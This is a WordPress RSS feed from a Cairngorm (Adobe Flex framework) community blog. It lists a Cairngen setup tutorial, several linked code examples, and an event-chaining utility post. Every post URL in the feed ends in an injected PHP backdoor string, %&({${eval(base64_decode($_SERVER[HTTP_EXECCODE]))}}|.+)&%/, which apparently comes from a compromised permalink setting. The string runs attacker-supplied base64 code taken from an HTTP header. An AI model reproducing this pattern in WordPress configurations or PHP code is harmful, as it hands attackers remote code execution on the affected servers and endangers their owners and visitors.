<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/2.3.2" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>cairngormdocs.org</title>
	<link>http://cairngormdocs.org/blog</link>
	<description>Cairngormdocs.org Blog</description>
	<pubDate>Fri, 22 Feb 2008 11:55:16 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.3.2</generator>
	<language>en</language>
			<item>
		<title>Cairngen 1.2: From 0 to Cairngorm in 10 seconds (well almost)</title>
		<link>http://cairngormdocs.org/blog/2007/07/23/cairngen-12-from-0-to-cairngorm-in-10-seconds-well-almost/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://cairngormdocs.org/blog/2007/07/23/cairngen-12-from-0-to-cairngorm-in-10-seconds-well-almost/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Mon, 23 Jul 2007 11:02:38 +0000</pubDate>
		<dc:creator>Mark Ellul</dc:creator>
		
		<category><![CDATA[Cairngorm]]></category>

		<category><![CDATA[Flex 2]]></category>

		<guid isPermaLink="false">http://cairngormdocs.org/blog/?p=31</guid>
		<description><![CDATA[Mark Ellul
Software Engineer, who specialises in .NET, Flex and starting to learn Ruby on Rails...]]></description>
			<content:encoded><![CDATA[<p><strong>Cairngorm Version: </strong>2.2 and below&#8230;<br />
<strong>Introduction:</strong></p>
<p>I don&#8217;t know about you all, but setting up my first cairngorm app was daunting to say the least.<br />
I have set up a few Flex applications now using Cairngorm, and I found the most useful utility I have ever used to help setup a new Flex Application to use cairngorm had to be Cairngen.</p>
<p><a title="Cairngen" href="http://www.ericfeminella.com/blog/cairngen/"><br />
Cairngen</a></p>
<p>Cairngen, found at the above link was created by Eric Feminella, a talented and generous engineer (as cairngen is free) which uses Ant in Eclipse to generate:</p>
<ol>
<li>The directory structure for you commands, events, views, model, vo&#8217;s and business logic.</li>
<li>The Classes used for most parts of your appliction.</li>
</ol>
<p><strong>Installation</strong></p>
<p><strong>1. ANT -</strong> First make sure you have ant installed inside of your Flexbuilder or Eclipse programs..</p>
<p><em>Flexbuilder</em> - Peter Elsts offers instructions on how to do so on his blog <a title="Ant for Flex Builder" href="http://www.peterelst.com/blog/2006/09/03/flex-builder-2-ant-support/">click here</a></p>
<p><em>Eclipse</em> - There are plenty of links on how to do this, if you find any that are particularly useful, please post it in the comments.</p>
<p><strong>2. Cairngen - </strong>Cairngen can be downloaded at the above<a title="Cairngen" href="http://www.ericfeminella.com/blog/cairngen/"> link </a>and is simple to install&#8230; Extract it into your flex application folder. I am not going to go into details as they are explained on Eric site..</p>
<p><strong>NOTES</strong>:</p>
<ul>
<li>I am not an journalist, and even though english is my first language, I prefer computer languages ;o)</li>
<li>When editing your project.properties, you can only create one command sequence and VO at a time, so you will find yourself editing that file over and over again&#8230; which is still better than doing it from scratch.</li>
<li>Eric uses a template approach, so if you want to make your commands or delegates inherit from different classes.. You can change the template necessary.</li>
</ul>
<p><strong>Summary</strong></p>
<p>I hope this helps you in your cairngorm endeavours. It certainly has helped me.</p>
<p>P.S</p>
<p>I hope to be doing some more posts in the coming future</p>
<p>Regards</p>
<p><a href="http://www.catalystic.com/blog/default.html">Mark Ellul </a></p>
]]></content:encoded>
			<wfw:commentRss>http://cairngormdocs.org/blog/2007/07/23/cairngen-12-from-0-to-cairngorm-in-10-seconds-well-almost/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Indiver Nagpal&#8217;s ColdFusion-based Contact Manager example</title>
		<link>http://cairngormdocs.org/blog/2007/02/23/indiver-nagpals-coldfusion-based-contact-manager-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://cairngormdocs.org/blog/2007/02/23/indiver-nagpals-coldfusion-based-contact-manager-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Fri, 23 Feb 2007 14:32:25 +0000</pubDate>
		<dc:creator>Douglas McCarroll</dc:creator>
		
		<category><![CDATA[Cairngorm Code Examples]]></category>

		<category><![CDATA[ColdFusion]]></category>

		<guid isPermaLink="false">http://cairngormdocs.org/blog/?p=30</guid>
		<description><![CDATA[Created by: Indiver Nagpal
Uses Cairngorm version: 2.0
Supported/maintained by Adobe: No
You&#8217;ll find it here.
Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this [...]]]></description>
			<content:encoded><![CDATA[<p>Created by: Indiver Nagpal</p>
<p>Uses Cairngorm version: 2.0</p>
<p>Supported/maintained by Adobe: No</p>
<p>You&#8217;ll find it <a target="_blank" href="http://nagpals.com/blog/default.cfm/2007/2/23/A-simple-contact-manager--a-Flexbased-Cairngorm-application">here</a>.</p>
<p>Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this post&#8217;s comments. We invite you to contribute!</p>
<p>(Search tags: ColdFusion, Flex)</p>
]]></content:encoded>
			<wfw:commentRss>http://cairngormdocs.org/blog/2007/02/23/indiver-nagpals-coldfusion-based-contact-manager-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Nico Lierman&#8217;s &#8220;Hello World&#8221; Example</title>
		<link>http://cairngormdocs.org/blog/2007/01/19/nico-liermans-hello-world-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://cairngormdocs.org/blog/2007/01/19/nico-liermans-hello-world-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Fri, 19 Jan 2007 15:56:53 +0000</pubDate>
		<dc:creator>Douglas McCarroll</dc:creator>
		
		<category><![CDATA[Cairngorm Code Examples]]></category>

		<guid isPermaLink="false">http://cairngormdocs.org/blog/?p=29</guid>
		<description><![CDATA[Created by: Nico Lierman
Uses Cairngorm version: 2.1
Supported/maintained by Adobe: No
You&#8217;ll find it here.
Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this [...]]]></description>
			<content:encoded><![CDATA[<p>Created by: Nico Lierman</p>
<p>Uses Cairngorm version: 2.1</p>
<p>Supported/maintained by Adobe: No</p>
<p>You&#8217;ll find it <a target="_blank" href="http://www.aboutnico.be/?p=46">here</a>.</p>
<p>Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this post&#8217;s comments. We invite you to contribute!</p>
<p>(Search tag: Flex)</p>
]]></content:encoded>
			<wfw:commentRss>http://cairngormdocs.org/blog/2007/01/19/nico-liermans-hello-world-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Sequencing multiple commands</title>
		<link>http://cairngormdocs.org/blog/2006/12/24/sequencing-multiple-commands/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://cairngormdocs.org/blog/2006/12/24/sequencing-multiple-commands/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sun, 24 Dec 2006 11:45:09 +0000</pubDate>
		<dc:creator>Bjorn Schultheiss</dc:creator>
		
		<category><![CDATA[Cairngorm]]></category>

		<category><![CDATA[Cairngorm Code Examples]]></category>

		<category><![CDATA[Flex 2]]></category>

		<guid isPermaLink="false">http://cairngormdocs.org/blog/?p=27</guid>
		<description><![CDATA[In your cairngorm Flex 2 application you may require to string a sequence of commands together. This may occur in your application&#8217;s initialization process or in the view from a user gesture.
For example, in the case of an e-commerce application on initialization you may be required to get all categories, sub-categories related to a category [...]]]></description>
			<content:encoded><![CDATA[<p>In your cairngorm Flex 2 application you may require to string a sequence of commands together. This may occur in your application&#8217;s initialization process or in the view from a user gesture.</p>
<p>For example, in the case of an e-commerce application on initialization you may be required to get all categories, sub-categories related to a category and the products related to a sub-category all in one process.</p>
<p>In cairngorm each command requires an event to be fired in order to execute the command. Now where you create that next event to be fired is usually in the subsequent command, prior to setting it to that command&#8217;s nextEvent property.</p>
<p>Perhaps this approach may not be suitable depending on your commands (as in one my cases) so i created a utility for chaining events together so that a sequence of events can be fired at the developer&#8217;s desire.</p>
<p>To demonstrate a scenario of the usage of this utility i have created a small example (<a title="Event Chaining Example" href="http://www.cairngormdocs.org/bjorn_schultheiss/eventChaining/EventChainExample.html">click here</a> and right-click to download source) and an illustration of the example.</p>
<p><img alt="Event Chaining Diagram" src="http://www.cairngormdocs.org/bjorn_schultheiss/eventChaining/EventChainDiagramRed.jpg" /></p>
<p>What i&#8217;ve done is create a sub-class of CairngormEvent which has a public property called nextChainedEvent.<br />
Then I&#8217;ve create a utility class called EventChainFactory with a method chainEvents, which accepts an array of ChainEvent instances as its only parameter with each event in the array ordered in the order you want your sequence of events fired in. The method returns a ChainEvent instance with each subsequent event set to the next event&#8217;s nextChainedEvent property.</p>
<p>Enjoy and dont hestitate to improve it.</p>
<p>Regards,<br />
Bjorn Schultheiss</p>
]]></content:encoded>
			<wfw:commentRss>http://cairngormdocs.org/blog/2006/12/24/sequencing-multiple-commands/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Chen Bekor&#8217;s &#8220;CairngormStore with Stub BusinessDelegates&#8221; Example</title>
		<link>http://cairngormdocs.org/blog/2006/12/03/chen-bekors-cairngormstore-with-stub-businessdelegates-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://cairngormdocs.org/blog/2006/12/03/chen-bekors-cairngormstore-with-stub-businessdelegates-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sun, 03 Dec 2006 19:52:32 +0000</pubDate>
		<dc:creator>Douglas McCarroll</dc:creator>
		
		<category><![CDATA[Cairngorm Code Examples]]></category>

		<guid isPermaLink="false">http://cairngormdocs.org/blog/?p=26</guid>
		<description><![CDATA[Created by: Chen Bekor
Uses Cairngorm version: 2.1, 2.2.1
Supported/maintained by Adobe: No
You&#8217;ll find the 2.1 version here and the 2.2.1 version here.
Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating [...]]]></description>
			<content:encoded><![CDATA[<p>Created by: Chen Bekor</p>
<p>Uses Cairngorm version: 2.1, 2.2.1</p>
<p>Supported/maintained by Adobe: No</p>
<p>You&#8217;ll find the 2.1 version <a target="_blank" href="http://ntier.wordpress.com/">here</a> and the 2.2.1 version <a target="_blank" href="http://www.brightworks.com/flex_ability/?p=61">here</a>.</p>
<p>Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this post&#8217;s comments. We invite you to contribute!</p>
<p>(Search tag: Flex)</p>
]]></content:encoded>
			<wfw:commentRss>http://cairngormdocs.org/blog/2006/12/03/chen-bekors-cairngormstore-with-stub-businessdelegates-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Derek Wischusen&#8217;s Ruby on Rails &#038; WebORB &#8220;Issue Tracker&#8221; Example</title>
		<link>http://cairngormdocs.org/blog/2006/12/02/derek-wischusens-ruby-on-rails-issue-tracker-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://cairngormdocs.org/blog/2006/12/02/derek-wischusens-ruby-on-rails-issue-tracker-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sat, 02 Dec 2006 16:17:15 +0000</pubDate>
		<dc:creator>Douglas McCarroll</dc:creator>
		
		<category><![CDATA[Cairngorm Code Examples]]></category>

		<guid isPermaLink="false">http://cairngormdocs.org/blog/?p=25</guid>
		<description><![CDATA[Created by: Derek Wischusen
Uses Cairngorm version: 2.1
Supported/maintained by Adobe: No
This sample app is part of the Flex Ruby On Rails SDK, which you can find here.
Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, [...]]]></description>
			<content:encoded><![CDATA[<p>Created by: Derek Wischusen</p>
<p>Uses Cairngorm version: 2.1</p>
<p>Supported/maintained by Adobe: No</p>
<p>This sample app is part of the Flex Ruby On Rails SDK, which you can find <a target="_blank" href="http://code.google.com/p/rubyonrails-ria-sdk-by-adobe/">here</a>.</p>
<p>Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this post&#8217;s comments. We invite you to contribute!</p>
<p>(Search tag: Flex)</p>
]]></content:encoded>
			<wfw:commentRss>http://cairngormdocs.org/blog/2006/12/02/derek-wischusens-ruby-on-rails-issue-tracker-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Benoit Hediard&#8217;s &#8220;PhonesCairngorm2&#8243; Example</title>
		<link>http://cairngormdocs.org/blog/2006/11/29/benoit-hediards-phonescairngorm2-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://cairngormdocs.org/blog/2006/11/29/benoit-hediards-phonescairngorm2-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Wed, 29 Nov 2006 15:17:11 +0000</pubDate>
		<dc:creator>Douglas McCarroll</dc:creator>
		
		<category><![CDATA[Cairngorm Code Examples]]></category>

		<guid isPermaLink="false">http://cairngormdocs.org/blog/?p=24</guid>
		<description><![CDATA[Created by: Benoit Hediard
Uses Cairngorm version: 2.0
Supported/maintained by Adobe: No
Download it here.
Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this post&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p>Created by: Benoit Hediard</p>
<p>Uses Cairngorm version: 2.0</p>
<p>Supported/maintained by Adobe: No</p>
<p>Download it <a target="_blank" href="http://www.benorama.com/flex/samples/PhonesCairngorm2.zip">here</a>.</p>
<p>Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this post&#8217;s comments. We invite you to contribute!</p>
<p>(Search tag: Flex)</p>
]]></content:encoded>
			<wfw:commentRss>http://cairngormdocs.org/blog/2006/11/29/benoit-hediards-phonescairngorm2-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Alex Uhlmann&#8217;s Login Example</title>
		<link>http://cairngormdocs.org/blog/2006/11/28/alex-uhlmanns-login-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://cairngormdocs.org/blog/2006/11/28/alex-uhlmanns-login-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 28 Nov 2006 14:29:14 +0000</pubDate>
		<dc:creator>Douglas McCarroll</dc:creator>
		
		<category><![CDATA[Cairngorm Code Examples]]></category>

		<guid isPermaLink="false">http://cairngormdocs.org/blog/?p=23</guid>
		<description><![CDATA[Created by: Alex Uhlmann
Uses Cairngorm version: 2.0
Supported/maintained by Adobe: Yes
Get it here.
Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this post&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p>Created by: Alex Uhlmann</p>
<p>Uses Cairngorm version: 2.0</p>
<p>Supported/maintained by Adobe: Yes</p>
<p>Get it <a target="_blank" href="http://weblogs.macromedia.com/auhlmann/archives/2006/07/cairngorm_2_for_1.cfm">here</a>.</p>
<p>Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this post&#8217;s comments. We invite you to contribute!</p>
<p>(Search tag: Flex)</p>
]]></content:encoded>
			<wfw:commentRss>http://cairngormdocs.org/blog/2006/11/28/alex-uhlmanns-login-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Jesse Warden&#8217;s &#8220;WebService &#038; Cairngorm 2&#8243; Example</title>
		<link>http://cairngormdocs.org/blog/2006/11/25/jesse-wardens-webservice-cairngorm-2-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://cairngormdocs.org/blog/2006/11/25/jesse-wardens-webservice-cairngorm-2-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sat, 25 Nov 2006 13:54:00 +0000</pubDate>
		<dc:creator>Douglas McCarroll</dc:creator>
		
		<category><![CDATA[Cairngorm]]></category>

		<category><![CDATA[Cairngorm Code Examples]]></category>

		<category><![CDATA[Mashups]]></category>

		<category><![CDATA[WebService]]></category>

		<guid isPermaLink="false">http://cairngormdocs.org/blog/?p=22</guid>
		<description><![CDATA[Created by: Jesse Warden
Uses Cairngorm version: 2.0
Supported/maintained by Adobe: No
Get it here.
Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this post&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p>Created by: Jesse Warden</p>
<p>Uses Cairngorm version: 2.0</p>
<p>Supported/maintained by Adobe: No</p>
<p>Get it <a target="_blank" href="http://www.jessewarden.com/archives/2006/07/flex_2_webservice.html">here</a>.</p>
<p>Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this post&#8217;s comments. We invite you to contribute!</p>
<p>(Search tag: Flex)</p>
]]></content:encoded>
			<wfw:commentRss>http://cairngormdocs.org/blog/2006/11/25/jesse-wardens-webservice-cairngorm-2-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Renaun Erickson&#8217;s &#8220;Switching CairngormStore&#8217;s Backend Between AMFPHP &#038; ColdFusion&#8221; Example</title>
		<link>http://cairngormdocs.org/blog/2006/11/25/renaun-ericksons-switching-cairngormstores-backend-between-amfphp-coldfusion-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://cairngormdocs.org/blog/2006/11/25/renaun-ericksons-switching-cairngormstores-backend-between-amfphp-coldfusion-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sat, 25 Nov 2006 13:41:58 +0000</pubDate>
		<dc:creator>Douglas McCarroll</dc:creator>
		
		<category><![CDATA[AMFPHP]]></category>

		<category><![CDATA[Cairngorm Code Examples]]></category>

		<category><![CDATA[ColdFusion]]></category>

		<guid isPermaLink="false">http://cairngormdocs.org/blog/?p=21</guid>
		<description><![CDATA[Created by: Renaun Erickson
Uses Cairngorm version: 2.1
Supported/maintained by Adobe: No
Get it here.
Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this post&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p>Created by: Renaun Erickson</p>
<p>Uses Cairngorm version: 2.1</p>
<p>Supported/maintained by Adobe: No</p>
<p>Get it <a target="_blank" href="http://renaun.com/blog/2006/11/01/144/">here</a>.</p>
<p>Note to readers: We (the CairngormDocs community) are using these &#8216;Cairngorm Code Example&#8217; blog posts as a quasi-wiki for posting examples. What this means is that any and all notes, explanations, comments and opinions relating to this example can be found in this post&#8217;s comments. We invite you to contribute!</p>
<p>(Search tag: Flex)</p>
]]></content:encoded>
			<wfw:commentRss>http://cairngormdocs.org/blog/2006/11/25/renaun-ericksons-switching-cairngormstores-backend-between-amfphp-coldfusion-example/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
